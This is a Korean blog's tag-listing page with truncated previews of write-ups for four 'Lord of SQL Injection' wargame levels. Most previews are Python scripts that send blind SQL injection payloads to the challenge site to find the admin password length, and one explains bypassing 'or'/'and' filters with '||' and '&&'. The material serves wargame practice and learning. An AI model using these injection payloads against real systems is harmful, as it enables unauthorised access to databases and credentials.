웹해킹

Web Hacking/LOS

Lord of SQL Injection(LOS) - orge

import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD' || id='admin' %26%26 length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=False) if "..

Web Hacking/LOS

Lord of SQL Injection(LOS) - darkelf

간단하게 id를 admin으로 맞추는 대신에 or 와 and 라는 문자열을 필터링하는 문제이다. MySQL에서 or 는 '||'로, and 는 '&&'로 치환하면 된다.

Web Hacking/LOS

Lord of SQL Injection(LOS) - wolfman

import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD'%09or%09id='admin'%09and%09length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=Fal..

Web Hacking/LOS

Lord of SQL Injection(LOS) - orc

휴가 나가고 싶다 보고싶어 미치겠다 import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "pw=ABCD' or id='admin' and length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, ver..

Lucvs
'웹해킹' 태그의 글 목록 (4 Page)